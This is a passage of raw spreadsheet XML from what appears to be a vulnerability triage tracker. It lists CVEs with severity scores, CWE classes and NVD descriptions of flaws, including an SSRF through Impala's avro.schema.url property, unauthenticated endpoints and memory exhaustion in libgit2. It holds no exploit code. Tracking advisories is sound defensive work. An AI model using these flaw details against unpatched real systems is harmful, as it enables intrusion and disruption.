      <c r="N969" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O969" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P969" s="5" t="inlineStr"/>
      <c r="Q969" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R969" s="5" t="inlineStr">
        <is>
          <t>In Modem, there is a possible system crash due to a missing bounds check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01371002; Issue ID: MSV-9020.</t>
        </is>
      </c>
      <c r="S969" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20503</t>
        </is>
      </c>
    </row>
    <row r="970">
      <c r="A970" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B970" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C970" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20504</t>
        </is>
      </c>
      <c r="D970" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E970" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F970" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G970" s="5" t="inlineStr"/>
      <c r="H970" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I970" s="5" t="inlineStr"/>
      <c r="J970" s="5" t="inlineStr"/>
      <c r="K970" s="5" t="inlineStr">
        <is>
          <t>mediatek:mt2735, mediatek:mt2735_firmware, mediatek:mt6833, mediatek:mt6833_firmware, mediatek:mt6853, mediatek:mt6853_firmware, mediatek:mt6855, mediatek:mt6855_firmware, mediatek:mt6873, mediatek:mt6873_firmware</t>
        </is>
      </c>
      <c r="L970" s="5" t="inlineStr"/>
      <c r="M970" s="5" t="inlineStr"/>
      <c r="N970" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O970" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P970" s="5" t="inlineStr"/>
      <c r="Q970" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R970" s="5" t="inlineStr">
        <is>
          <t>In Modem, there is a possible system crash due to a missing bounds check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY00755024; Issue ID: MSV-7865.</t>
        </is>
      </c>
      <c r="S970" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20504</t>
        </is>
      </c>
    </row>
    <row r="971">
      <c r="A971" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B971" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C971" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21092</t>
        </is>
      </c>
      <c r="D971" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E971" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F971" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G971" s="5" t="inlineStr"/>
      <c r="H971" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I971" s="5" t="inlineStr"/>
      <c r="J971" s="5" t="inlineStr"/>
      <c r="K971" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L971" s="5" t="inlineStr"/>
      <c r="M971" s="5" t="inlineStr"/>
      <c r="N971" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O971" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P971" s="5" t="inlineStr"/>
      <c r="Q971" s="5" t="inlineStr">
        <is>
          <t>CWE-35</t>
        </is>
      </c>
      <c r="R971" s="5" t="inlineStr">
        <is>
          <t>Path traversal in ImsService prior to SMR Sep-2026 Release 1 allows remote attackers to create image files with system server privilege.</t>
        </is>
      </c>
      <c r="S971" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21092</t>
        </is>
      </c>
    </row>
    <row r="972">
      <c r="A972" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B972" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C972" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27463</t>
        </is>
      </c>
      <c r="D972" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E972" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F972" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G972" s="5" t="inlineStr"/>
      <c r="H972" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I972" s="5" t="inlineStr"/>
      <c r="J972" s="5" t="inlineStr"/>
      <c r="K972" s="5" t="inlineStr"/>
      <c r="L972" s="5" t="inlineStr"/>
      <c r="M972" s="5" t="inlineStr"/>
      <c r="N972" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O972" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P972" s="5" t="inlineStr"/>
      <c r="Q972" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R972" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, the HTML title attribute of the logo in the login page contains the complete iTop version. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S972" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27463</t>
        </is>
      </c>
    </row>
    <row r="973">
      <c r="A973" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B973" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C973" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37067</t>
        </is>
      </c>
      <c r="D973" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E973" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F973" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G973" s="5" t="inlineStr"/>
      <c r="H973" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I973" s="5" t="inlineStr"/>
      <c r="J973" s="5" t="inlineStr"/>
      <c r="K973" s="5" t="inlineStr"/>
      <c r="L973" s="5" t="inlineStr"/>
      <c r="M973" s="5" t="inlineStr"/>
      <c r="N973" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O973" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P973" s="5" t="inlineStr"/>
      <c r="Q973" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R973" s="5" t="inlineStr">
        <is>
          <t>Incorrect access control in /vfm-admin/admin-panel/view/save-cvs.php in Veno File Manager Project 4.4.9 allows an unauthenticated attacker to extract all application logs from a desired date forwards via a specially crafted POST request.</t>
        </is>
      </c>
      <c r="S973" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37067</t>
        </is>
      </c>
    </row>
    <row r="974">
      <c r="A974" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B974" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C974" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38819</t>
        </is>
      </c>
      <c r="D974" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E974" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F974" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G974" s="5" t="inlineStr"/>
      <c r="H974" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I974" s="5" t="inlineStr"/>
      <c r="J974" s="5" t="inlineStr"/>
      <c r="K974" s="5" t="inlineStr"/>
      <c r="L974" s="5" t="inlineStr"/>
      <c r="M974" s="5" t="inlineStr"/>
      <c r="N974" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O974" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P974" s="5" t="inlineStr"/>
      <c r="Q974" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="R974" s="5" t="inlineStr">
        <is>
          <t>Multiple memory leaks in openNDS before 11.0.0 allow an unauthenticated attacker on the captive portal network to exhaust all available memory on the device within minutes.</t>
        </is>
      </c>
      <c r="S974" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38819</t>
        </is>
      </c>
    </row>
    <row r="975">
      <c r="A975" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B975" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C975" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50554</t>
        </is>
      </c>
      <c r="D975" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E975" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F975" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G975" s="5" t="inlineStr"/>
      <c r="H975" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I975" s="5" t="inlineStr"/>
      <c r="J975" s="5" t="inlineStr"/>
      <c r="K975" s="5" t="inlineStr"/>
      <c r="L975" s="5" t="inlineStr"/>
      <c r="M975" s="5" t="inlineStr"/>
      <c r="N975" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O975" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P975" s="5" t="inlineStr"/>
      <c r="Q975" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-285</t>
        </is>
      </c>
      <c r="R975" s="5" t="inlineStr">
        <is>
          <t>Note Mark is an open-source note-taking application. Prior to version 0.19.5, GET /api/books/{bookID}/notes is an unauthenticated endpoint that accepts a "deleted" query parameter. When the request is ?deleted=true, the service runs the query with Unscoped() (bypassing GORM's soft-delete scope) but keeps the read-authorization clause as "owner_id = ? OR is_public = ?". As a result, any unauthenticated caller can enumerate the metadata of soft-deleted ("trashed") notes belonging to any public book — notes the owner explicitly deleted and expected to be removed from public view. This issue has been patched in version 0.19.5.</t>
        </is>
      </c>
      <c r="S975" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50554</t>
        </is>
      </c>
    </row>
    <row r="976">
      <c r="A976" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B976" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C976" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53497</t>
        </is>
      </c>
      <c r="D976" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E976" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F976" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G976" s="5" t="inlineStr"/>
      <c r="H976" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I976" s="5" t="inlineStr"/>
      <c r="J976" s="5" t="inlineStr"/>
      <c r="K976" s="5" t="inlineStr"/>
      <c r="L976" s="5" t="inlineStr"/>
      <c r="M976" s="5" t="inlineStr"/>
      <c r="N976" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O976" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P976" s="5" t="inlineStr"/>
      <c r="Q976" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-359</t>
        </is>
      </c>
      <c r="R976" s="5" t="inlineStr">
        <is>
          <t>CrossWatch (CW) is a synchronization engine. Prior to version 0.9.21, GET /api/app-auth/status is accessible without authentication and returns the other_sessions array, which exposes metadata of all active sessions — including originating IP addresses, User-Agent strings, internal session IDs, and creation/expiry timestamps. Any unauthenticated network attacker can enumerate this data without credentials. Version 0.9.21 fixes the issue.</t>
        </is>
      </c>
      <c r="S976" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53497</t>
        </is>
      </c>
    </row>
    <row r="977">
      <c r="A977" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B977" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C977" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53585</t>
        </is>
      </c>
      <c r="D977" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E977" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F977" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G977" s="5" t="inlineStr"/>
      <c r="H977" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I977" s="5" t="inlineStr"/>
      <c r="J977" s="5" t="inlineStr"/>
      <c r="K977" s="5" t="inlineStr"/>
      <c r="L977" s="5" t="inlineStr"/>
      <c r="M977" s="5" t="inlineStr"/>
      <c r="N977" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O977" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P977" s="5" t="inlineStr"/>
      <c r="Q977" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R977" s="5" t="inlineStr">
        <is>
          <t>libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Prior to 1.8.6 and 1.9.5, git_delta_apply in src/libgit2/delta.c trusts the attacker-controlled res_sz value parsed by hdr_sz from a delta object header and passes that amount to git__malloc before validating delta instructions. Malicious pack data supplied through git_clone, git_fetch, git_remote_fetch, git_indexer_append, or a local attacker-supplied repository can use a very small multi-level OFS_DELTA chain to retain extremely large allocations and exhaust memory. This issue is fixed in versions 1.8.6 and 1.9.5.</t>
        </is>
      </c>
      <c r="S977" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53585</t>
        </is>
      </c>
    </row>
    <row r="978">
      <c r="A978" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B978" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C978" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54048</t>
        </is>
      </c>
      <c r="D978" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E978" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F978" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G978" s="5" t="inlineStr"/>
      <c r="H978" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I978" s="5" t="inlineStr"/>
      <c r="J978" s="5" t="inlineStr"/>
      <c r="K978" s="5" t="inlineStr">
        <is>
          <t>apache:impala</t>
        </is>
      </c>
      <c r="L978" s="5" t="inlineStr"/>
      <c r="M978" s="5" t="inlineStr"/>
      <c r="N978" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O978" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P978" s="5" t="inlineStr"/>
      <c r="Q978" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R978" s="5" t="inlineStr">
        <is>
          <t>Specifying tblproperties('avro.schema.url'=' http://...' ) or with a 'file:///' URI on a table in Impala 2.0.0 to 4.5.1 on all platforms allows an attacker to trigger a GET request to internal endpoints they may not have access to but that Impala does and the response my be exposed via parsing error messages.
Users are recommended to upgrade to version 4.5.2, which fixes this issue.</t>
        </is>
      </c>
      <c r="S978" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54048</t>
        </is>
      </c>
    </row>
    <row r="979">
      <c r="A979" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B979" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C979" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54766</t>
        </is>
      </c>
      <c r="D979" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E979" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F979" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G979" s="5" t="inlineStr"/>
      <c r="H979" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I979" s="5" t="inlineStr"/>
      <c r="J979" s="5" t="inlineStr"/>
      <c r="K979" s="5" t="inlineStr"/>
      <c r="L979" s="5" t="inlineStr"/>
      <c r="M979" s="5" t="inlineStr"/>
      <c r="N979" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O979" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P979" s="5" t="inlineStr"/>
      <c r="Q979" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-863</t>
        </is>
      </c>
      <c r="R979" s="5" t="inlineStr">
        <is>
          <t>Vikunja is an open-source self-hosted task management platform. From 0.21.0 until 2.4.0, the project duplication operation in pkg/models/project_duplicate.go allows an authenticated user who can read a source project to place its duplicate beneath an arbitrary target parent project. ProjectDuplicate.CanCreate calls parent.CanCreate on an unhydrated Project containing only the body supplied parent_project_id instead of calling parent.CanWrite, so the target parent write-permission check is skipped. The ordinary project creation path enforces that permission, but PUT /api/v1/projects/{project}/duplicate does not, allowing attacker-owned content to be injected into another user or team project hierarchy. This issue is fixed in version 2.4.0.</t>
        </is>
      </c>
      <c r="S979" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54766</t>
        </is>
      </c>
    </row>
    <row r="980">
      <c r="A980" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B980" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C980" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55419</t>
        </is>
      </c>
      <c r="D980" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E980" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F980" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G980" s="5" t="inlineStr"/>
      <c r="H980" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I980" s="5" t="inlineStr"/>
      <c r="J980" s="5" t="inlineStr"/>
      <c r="K980" s="5" t="inlineStr"/>
      <c r="L980" s="5" t="inlineStr"/>
      <c r="M980" s="5" t="inlineStr"/>
      <c r="N980" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O980" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P980" s="5" t="inlineStr"/>
      <c r="Q980" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R980" s="5" t="inlineStr">
        <is>
          <t>Reachy Mini is an SDK for controlling Reachy Mini robots. Prior to 1.8.2, the Reachy Mini daemon exposes the /api/media/sounds/upload endpoint implemented by the upload_sound method in src/reachy_mini/daemon/app/routers/media.py without authentication, file-extension checks, content validation, or size validation. The daemon binds to 0.0.0.0 by default and uses permissive CORS allow_origins=["*"], allowing an unauthenticated network attacker to upload arbitrary file types that are written to /tmp/reachy_mini_sounds/&lt;original_filename&gt;. Malicious files can compromise stored-data integrity and can serve as a foothold when combined with other vulnerabilities. This issue is fixed in version 1.8.2.</t>
        </is>
      </c>
      <c r="S980" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55419</t>
        </is>
      </c>
    </row>
    <row r="981">
      <c r="A981" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B981" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C981" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55512</t>
        </is>
      </c>
      <c r="D981" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E981" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F981" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G981" s="5" t="inlineStr"/>
      <c r="H981" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I981" s="5" t="inlineStr"/>
      <c r="J981" s="5" t="inlineStr"/>
      <c r="K981" s="5" t="inlineStr"/>
      <c r="L981" s="5" t="inlineStr"/>
      <c r="M981" s="5" t="inlineStr"/>
      <c r="N981" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O981" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P981" s="5" t="inlineStr"/>
      <c r="Q981" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R981" s="5" t="inlineStr">
        <is>
          <t>nebula-mesh is a self-hosted control plane for Slack Nebula mesh VPN. From version 0.2.0 to before version 0.5.0, when OIDC is enabled, GET /ui/oidc/login is reachable without authentication and is registered outside the Web UI rate-limited auth routes. Every request creates a fresh random OIDC state value and stores it in an in-memory map for 10m. Expired states are swept lazily, but there is no rate limit or maximum live-state cap on the allocation path. An unauthenticated remote client can therefore grow OIDC.states for the full state TTL, bounded by request throughput rather than by configured auth rate limits. This issue has been patched in version 0.5.0.</t>
        </is>
      </c>
      <c r="S981" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55512</t>
        </is>
      </c>
    </row>
    <row r="982">
      <c r="A982" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B982" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C982" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55619</t>
        </is>
      </c>
      <c r="D982" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E982" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F982" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G982" s="5" t="inlineStr"/>
      <c r="H982" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I982" s="5" t="inlineStr"/>
      <c r="J982" s="5" t="inlineStr"/>
      <c r="K982" s="5" t="inlineStr"/>
      <c r="L982" s="5" t="inlineStr"/>
      <c r="M982" s="5" t="inlineStr"/>
      <c r="N982" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O982" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P982" s="5" t="inlineStr"/>
      <c r="Q982" s="5" t="inlineStr">
        <is>
          <t>CWE-1124, CWE-770</t>
        </is>
      </c>
      <c r="R982" s="5" t="inlineStr">
        <is>
          <t>eml_parser serves as a python module for parsing eml files and returning various information found in the e-mail as well as computed information. Prior to 3.0.2, eml_parser.parser.HeaderParser.header_fetch_parse in eml_parser/parser.py uses email.utils.getaddresses() to parse address-bearing e-mail headers. A deeply nested CFWS comment construct exhausts the standard-library recursive descent parser's call stack and raises RecursionError, which is not caught and therefore aborts parsing of the entire message. An attacker can disrupt SOC pipelines that process untrusted EML files, although callers already need to handle exceptions from malformed or pathological messages. This issue is fixed in version 3.0.2.</t>
        </is>
      </c>
      <c r="S982" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55619</t>
        </is>
      </c>
    </row>
    <row r="983">
      <c r="A983" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B983" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C983" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55624</t>
        </is>
      </c>
      <c r="D983" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E983" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F983" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G983" s="5" t="inlineStr"/>
      <c r="H983" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I983" s="5" t="inlineStr"/>
      <c r="J983" s="5" t="inlineStr"/>
      <c r="K983" s="5" t="inlineStr"/>
      <c r="L983" s="5" t="inlineStr"/>
      <c r="M983" s="5" t="inlineStr"/>
      <c r="N983" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O983" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P983" s="5" t="inlineStr"/>
      <c r="Q983" s="5" t="inlineStr">
        <is>
          <t>CWE-670</t>
        </is>
      </c>
      <c r="R983" s="5" t="inlineStr">
        <is>
          <t>MintyItanium Lost-Auction is an auction plugin for Minecraft. Prior to commit 88c920b05042929db334ba06d57f052b42d6b3f8, players can take items like barrier blocks or duplicate items from the GUI. Commit 88c920b05042929db334ba06d57f052b42d6b3f8 fixes the issue.</t>
        </is>
      </c>
      <c r="S983" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55624</t>
        </is>
      </c>
    </row>
    <row r="984">
      <c r="A984" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B984" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C984" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55867</t>
        </is>
      </c>
      <c r="D984" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E984" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F984" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G984" s="5" t="inlineStr"/>
      <c r="H984" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I984" s="5" t="inlineStr"/>
      <c r="J984" s="5" t="inlineStr"/>
      <c r="K984" s="5" t="inlineStr"/>
      <c r="L984" s="5" t="inlineStr"/>
      <c r="M984" s="5" t="inlineStr"/>
      <c r="N984" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O984" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P984" s="5" t="inlineStr"/>
      <c r="Q984" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R984" s="5" t="inlineStr">
        <is>
          <t>Graylog is a free and open log management platform. From 6.2.0 until 6.3.12, 7.0.7, and 7.1.2, the DELETE /users/{userId}/tokens/{idOrToken} endpoint implemented by UsersResource.revokeToken() in graylog2-server/src/main/java/org/graylog2/rest/resources/users/UsersResource.java checks USERS_TOKENREMOVE permission against the attacker-controlled userId path parameter before resolving the token selected by idOrToken. An authenticated user can provide an authorized userId while accessTokenService.loadById() or accessTokenService.load() resolves a token belonging to another user, including a service account or administrator, after which accessTokenService.destroy() deletes that token without checking AccessToken.getUserName(). The issue does not expose token contents, but unauthorized deletion causes integrity impact and can disrupt access-token-based integrations. This issue is fixed in versions 6.3.12, 7.0.7, and 7.1.2.</t>
        </is>
      </c>
      <c r="S984" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55867</t>
        </is>
      </c>
    </row>
    <row r="985">
      <c r="A985" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B985" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C985" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63435</t>
        </is>
      </c>
      <c r="D985" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E985" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F985" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
